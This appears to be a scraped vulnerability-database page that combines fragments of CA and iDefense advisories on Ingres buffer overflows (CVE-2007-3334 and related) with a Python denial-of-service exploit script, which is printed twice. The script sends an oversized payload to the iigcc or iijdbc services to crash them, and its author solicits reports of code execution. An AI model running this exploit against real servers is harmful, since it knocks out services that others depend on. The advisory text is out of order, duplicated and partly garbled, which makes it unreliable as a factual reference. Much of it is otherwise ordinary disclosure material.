http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com. 
For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com. 
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version. 
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)
 
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
 
if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)
 
payload += "\x42" * 4
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
 
print service + " crashed"
                        
| VAR-200706-0395 | CVE-2007-3334 | eTrust Secure Content Manager including  CA Used in products  Ingres Database Server For  Communications Server Heap-based buffer overflow vulnerability in components Related entries in the VARIoT exploits database: VAR-E-200706-0107 | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. 
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. 
3) Ingres wakeup file overwrite (reported by NGSSoftware) 
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named 
"alarmwkp.def" in the current directory, truncating the file if it 
already exists. The "wakeup" binary is setuid "ingres" and 
world-executable. Consequently, an attacker can truncate a file 
with the privileges of the "ingres" user. 
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to 
uuid_from_char() to cause a stack buffer overflow and the saved 
returned address can be overwritten. 
5) Ingres verifydb local stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the 
Ingres verifydb utility duve_get_args function. This only 
affects Ingres on the Windows operating system. Reported by 
iDefense as IDEF2023. This only affects Ingres on the Windows 
operating system. Reported by iDefense as IDEF2022. 
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High 
risk rating. 
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, 
   Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform 
   r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, 
   r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA 
products that embed Ingres. This includes Windows, Linux, and 
supported UNIX platforms. 
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed 
on the Security Notice page: 
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed 
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting: 
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory: 
http://www.ngssoftware.com/research/advisories/
iDefense Advisory: 
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com. 
For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com. 
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products. 
The SCM (Secure Content Manager) is one of the products that uses
Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP
requests/replies. For more information visit the following URLs. 
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications
Server is the main component responsible for receiving and handling
requests from the network. The Data Access Server is responsible for
handling requests from the Ingres JDBC Driver and .NET data providers. 
These requests are decoded into Ingres internal formats and passed on
to other components of the database server. 
The application does not properly validate the length of attacker
supplied data before copying it into a fixed size heap buffer. This
leads to an exploitable condition. 
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary
code with SYSTEM privileges. 
In order to exploit this vulnerability an attacker would have to send a
malformed request to the database server. This requires the ability to
establish a TCP session on port 10916 (iigcc) or 10923 (iigcd). 
Exploitation has been demonstrated to be trivial. 
IV. Previous versions may also be affected. In addition, any
application that uses the Ingres Database may be vulnerable. 
V. WORKAROUND
Employing firewalls or other access control methods can effectively
reduce exposure to this vulnerability. 
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed
Ingres. For more information consult CA's Security Alert at the
following URL. 
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3334 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. 
VIII. DISCLOSURE TIMELINE
01/16/2007  Initial vendor notification
01/17/2007  Initial vendor response
06/21/2007  Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous. 
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc. 
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission. 
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition. 
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version. 
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)
 
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
 
if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)
 
payload += "\x42" * 4
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
 
print service + " crashed"
                        
